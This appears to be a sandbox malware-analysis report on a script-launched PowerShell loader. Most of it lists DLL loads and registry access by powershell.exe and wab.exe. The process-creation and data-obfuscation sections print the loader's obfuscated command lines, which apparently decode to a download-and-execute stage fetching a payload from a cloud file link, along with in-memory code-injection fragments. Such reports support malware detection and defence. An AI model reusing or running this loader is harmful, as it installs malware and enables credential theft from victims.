              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2536676585.0000000007ACA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2536676585.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2536676585.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb? source: powershell.exe, 00000005.00000002.2539882083.00000000089E0000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: \AppData\Local\Temp\Rundturens.txt");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("powershell ");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("powershell ");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write(""");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("powershell ");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write(""");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("$Superexcrescence = 1;$Necroscopic18='Sub");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("powershell ");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write(""");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("$Superexcrescence = 1;$Necroscopic18='Sub");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("strin';$Necroscopic18+='g';");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("powershell ");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write(""");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("$Superexcrescence = 1;$Necroscopic18='Sub");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("strin';$Necroscopic18+='g';");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("Function Refrig213($Kllert){$");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFi
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5496, type: MEMORYSTR
              Source: Yara matchFile source: 00000005.00000002.2541730708.000000000AE11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2541238211.0000000008EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2532896490.00000000063BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2698898787.000001A0DA98C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Josts)$global:Optegnelsesbogen199 = [System.Text.Encoding]::ASCII.GetString($akvavitter)$global:Provivisection=$Optegnelsesbogen199.substring(325332,30363)<#Statuttens Throughways Wa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unstreamlined $Energimrke $Bellware), (Utilfredsstillende @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Formasteligt = [AppDomain]::CurrentDomain.GetAsse
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Masochisten)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Adulthoods, $false).DefineType($Agglutinate,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Josts)$global:Optegnelsesbogen199 = [System.Text.Encoding]::ASCII.GetString($akvavitter)$global:Provivisection=$Optegnelsesbogen199.substring(325332,30363)<#Statuttens Throughways Wa
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw 